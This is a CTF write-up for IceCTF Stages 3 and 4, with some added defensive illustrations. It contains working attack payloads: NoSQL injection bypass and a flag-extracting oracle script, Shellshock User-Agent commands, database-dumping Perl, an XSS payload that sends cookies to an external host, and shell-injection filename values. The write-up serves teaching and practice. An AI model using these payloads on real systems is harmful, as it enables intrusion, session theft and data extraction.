IceCTF{Write_up_Stage3_Stage4}
Stage 3
Vape Nation Stego - 50 pt
Open the image in StegSolve and cycle through the filters: the flag is hidden in the Green plane 0 filter.
Audio problems Forensics - 50 pt
Open the file in Sonic Visualiser, then go to Layer -> Add Spectrogram; the flag is readable in the spectrogram.
R.I.P Transmission Forensics -65 pt
Looking at the file header, it is an ELF binary.
But when we execute the ELF file with ./rip nothing interesting happens, so I decided to dump the strings and investigate the contents.
strings rip > rip_strings && subl rip_strings
Something looks weird; maybe there is an embedded file hidden inside. Let's extract it.
foremost -T rip
A password-protected zip file comes out. Let's crack it with fcrackzip:
fcrackzip -u -l 1-6 -c 'a1' 00002585.zip
The password is: bunny
Extract the zip file and bingo, the flag is there.
ChainedIn web 75 pt
The first thing that grabbed my attention was the footer of the home page.
We all know that MongoDB is a NoSQL backend, so most likely the vulnerability is a NoSQL injection. I had read some articles about this type of injection and how to exploit it, and a root-me challenge includes the same vulnerability. With Burp Suite we can see that the authentication request is sent in JSON format:
{"user":"admin","pass":"admin"}
and the response is:
{"message":"Invalid credential !"}
Let's try to bypass the authentication:
{"user":"admin","pass":{"$ne":"1"}}
We are authenticated as an administrator! So obviously it is a NoSQL injection, good :D
For more information visit http://blog.websecurify.com/2014/08/hacking-nodejs-and-mongodb.html
Let's now try to guess the password:
{"user":{"$ne":"1"},"pass":{"$regex":"I.*$"}}
The server returns {"message":"Welcome back Administrator!"} with 200 OK. Let's try some other character:
{"user":{"$ne":"1"},"pass":{"$regex":"v.*$"}}
The server returns {"message":"Invalid Credentials"} with 500 Internal Server Error.
We know that the flag starts with IceCTF{, and the service returns 200 OK when the regex matches and 500 when it does not. This is a boolean oracle: we can use it to guess the next character and recover the flag one character at a time. I wrote a Python script to retrieve the flag:
import requests

# Candidate characters, tried in this order for each position.
ascii_letters = 'IabcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ{-_}'

def url(password):
    # Send the $regex probe: 200 means the prefix matched, 500 means it did not.
    r = requests.post('http://chainedin.vuln.icec.tf/login',
                      json={"user": {"$ne": "1"}, "pass": {"$regex": password}})
    return r.status_code

def comp(flag):
    # Return the next flag character, or '' once no candidate matches.
    for i in ascii_letters:
        if url(flag + i + '.*$') == 200:
            return i
    return ''

if __name__ == "__main__":
    flag = "IceCTF{"
    for x in range(1, 60):
        nxt = comp(flag)
        if not nxt:
            break
        flag += nxt
        if nxt == '}':
            break
    print(flag)
The flag is : IceCTF{I_tou0gHT_Y0u_coulDNt_inJeCt_noSqL_tHanKs_monGo}
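How the bypass works and the check that stops it, as an added illustration that is not from the write-up or the challenge's code: a tiny in-memory stand-in for the Mongo matcher (equality, $ne and $regex only) with the vulnerable login beside a version that rejects non-string credentials. The user record is constructed.

```python
import re

# Constructed user record standing in for the challenge's database.
USERS = [{"user": "admin", "pass": "s3cret-Pa55"}]

def match_field(stored, cond):
    # Evaluate one field the way a Mongo-style query does: a plain value
    # means equality, a dict is a set of operators (only $ne and $regex here).
    if not isinstance(cond, dict):
        return stored == cond
    for op, arg in cond.items():
        if op == "$ne":
            if stored == arg:
                return False
        elif op == "$regex":
            if re.search(arg, stored) is None:
                return False
        else:
            raise ValueError("unsupported operator: " + op)
    return True

def vulnerable_login(body):
    # The parsed JSON body is forwarded into the query unchanged, so a client
    # that sends an object instead of a string gets to choose the operator.
    return any(match_field(u["user"], body["user"])
               and match_field(u["pass"], body["pass"]) for u in USERS)

def hardened_login(body):
    # Type-check before querying: credentials must be plain strings, so the
    # {"$ne": "1"} and {"$regex": ...} objects never reach the query.
    user, pw = body.get("user"), body.get("pass")
    if not (isinstance(user, str) and isinstance(pw, str)):
        return False
    return vulnerable_login({"user": user, "pass": pw})
```

The same type check is what a JSON schema validator on the login route would enforce; the 200/500 difference the write-up relies on also disappears once both failure paths return the same response.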
Geocities web 100 pt
This task took me a while to solve! The service seemed clean, nothing looked strange, and the website looked very old. So I tried scanning the target to identify anything; I used dirsearch, Nikto and Vega, but nothing came out. Reading the challenge description again for a hint, there it was: it is probably a Shellshock vulnerability, because it says "It must be running some ancient technology and probably hasn't been updated in years". I found this article very useful to start the exploit.
Let's check for the vulnerability:
curl -A "() { :; }; echo 'Content-type: text/html'; echo; /usr/bin/id;" http://geocities.vuln.icec.tf/
Bingo! It returns the uid and the gid, so the service is vulnerable to Shellshock.
Now run bash on the host and list the files by sending this User-Agent:
() { :; }; echo 'Content-type: text/html'; echo; /bin/bash -c 'ls'
Then read get_posts.pl the same way:
User-Agent: () { :; }; echo 'Content-type: text/html'; echo; /bin/bash -c 'cat get_posts.pl'
Obviously the flag is hidden in the database. We need to fetch the table names from the DB: change the script, save it on your own host, and download it to the target machine with wget.
#!/usr/bin/perl
use strict;
use DBI;

# Same DSN and credentials as the original get_posts.pl.
my $dbh = DBI->connect(
    "dbi:mysql:dbname=geocities;host=icectf_mariadb",
    "geocities", "geocities",
    { RaiseError => 1 },
) or die $DBI::errstr;

# List every table visible to this user.
my @tables = $dbh->tables();
print "@tables\n";
$dbh->disconnect();
Now change the code to select from the 47a6fd2ca39d2b0d6eea1c30008dd889 table:
#!/usr/bin/perl
use strict;
use DBI;

my $dbh = DBI->connect(
    "dbi:mysql:dbname=geocities;host=icectf_mariadb",
    "geocities", "geocities",
    { RaiseError => 1 },
) or die $DBI::errstr;

# Dump the interesting columns of every row in the table found above.
my $sth = $dbh->prepare("SELECT * FROM `47a6fd2ca39d2b0d6eea1c30008dd889`");
$sth->execute();
while (my $row = $sth->fetchrow_arrayref()) {
    print "$row->[1];$row->[2];$row->[3]\n";
}
$sth->finish();
$dbh->disconnect();
The flag is : IceCTF{7h3_g0s_WEr3_5UpeR_wE1Rd_mY_3ye5_HUr7}
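From the defender's side, as an added example that is not from the write-up: the Shellshock probe used above leaves a recognizable signature in the User-Agent (or Referer) field of the web server's access log, so it can be flagged after the fact. The log lines are constructed in Apache combined format.

```python
import re

# Constructed Apache combined-format access log lines (not real traffic).
SAMPLE_LOG = """\
10.0.0.5 - - [12/Aug/2016:10:01:02 +0000] "GET / HTTP/1.1" 200 512 "-" "Mozilla/5.0 (X11; Linux x86_64)"
10.0.0.9 - - [12/Aug/2016:10:01:07 +0000] "GET / HTTP/1.1" 200 37 "-" "() { :; }; echo 'Content-type: text/html'; echo; /usr/bin/id;"
10.0.0.9 - - [12/Aug/2016:10:01:09 +0000] "GET /get_posts.pl HTTP/1.1" 200 91 "-" "() { :;}; /bin/bash -c 'cat get_posts.pl'"
10.0.0.7 - - [12/Aug/2016:10:02:00 +0000] "GET /index.html HTTP/1.1" 200 2048 "http://example.test/" "curl/7.47.0"
"""

# Shellshock trigger: a bash function definition "() { ... }" at the start of
# a header value, followed by a ";" and the trailing commands bash executes.
SHELLSHOCK_RE = re.compile(r"\(\)\s*\{[^}]*\}\s*;")

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<req>[^"]*)" '
    r'(?P<status>\d{3}) \S+ "(?P<ref>[^"]*)" "(?P<ua>[^"]*)"$'
)

def find_shellshock(log_text):
    # Return (client ip, request path, status) for every line whose
    # User-Agent or Referer carries the function-definition pattern.
    # A 200 on such a line means the CGI handler answered the injected
    # command rather than rejecting it.
    hits = []
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        if SHELLSHOCK_RE.search(m.group("ua")) or SHELLSHOCK_RE.search(m.group("ref")):
            path = m.group("req").split(" ")[1]
            hits.append((m.group("ip"), path, m.group("status")))
    return hits

if __name__ == "__main__":
    for hit in find_shellshock(SAMPLE_LOG):
        print("shellshock probe from %s against %s (status %s)" % hit)
```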
Intercepted Conversations Pt. 1
Intercepted Conversations Pt. 2
Stage 4
ImgBlog web 130 pt
After registering and logging in, we checked the comment field and found it vulnerable to XSS.
We need to get the admin session to log in as admin:
<img src=x onerror=this.src='http://requestb.in/xfkbrpxf?c='+document.cookie>
Now we have the admin session. Change the current session with a cookie manager and refresh the page:
session=eyJ1c2VyIjoxfQ.CpyE3w.eBmlIu3HEm7vpDtAlE63CbMIK5A
And here we go, we are in!
I tried for a while to upload pictures and inject the file name with a null byte, a double extension, and SQL injection in the comment, but nothing worked. I noticed that the service filters the "filename" field of our requests, removing dots and slashes, and then passes it to the Linux bash; I think it is PHP's shell_exec() function. So, let's inject export $PATH to see how it reacts!
The global PATH of Linux is shown! So let's ls the files:
filename=" $HOME | ls "
We identified a flag.txt file.
filename=" $HOME | cat fl* "
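Why stripping dots and slashes was not enough, as an added example not taken from the write-up or the challenge's code: the weak filter it describes beside an allowlist check, and the argv-list form of invoking a tool on an upload (the `file` command is an assumed stand-in for whatever the service ran).

```python
import re

def weak_filter(filename):
    # The filter as observed in the write-up: only dots and slashes are
    # removed, which addresses path traversal but nothing a shell parses.
    return filename.replace(".", "").replace("/", "")

def weak_is_shell_safe(filename):
    # True only when no shell metacharacter survives the weak filter.
    return re.search(r"[\s$|;&`'\"<>*]", weak_filter(filename)) is None

# Allowlist: a plain base name plus an image extension, nothing else.
SAFE_NAME = re.compile(r"^[A-Za-z0-9_-]{1,64}\.(png|jpg|jpeg|gif)$")

def strict_filename(filename):
    # Reject rather than sanitize: anything outside the allowlist is an error.
    if SAFE_NAME.match(filename) is None:
        raise ValueError("rejected filename: %r" % filename)
    return filename

def is_accepted(filename):
    try:
        strict_filename(filename)
        return True
    except ValueError:
        return False

def build_argv(filename):
    # Pass the name as one argv element (e.g. to subprocess.run with a list)
    # instead of interpolating it into a shell string, so even a name that
    # somehow contains metacharacters is never parsed by a shell.
    return ["file", "--", strict_filename(filename)]
```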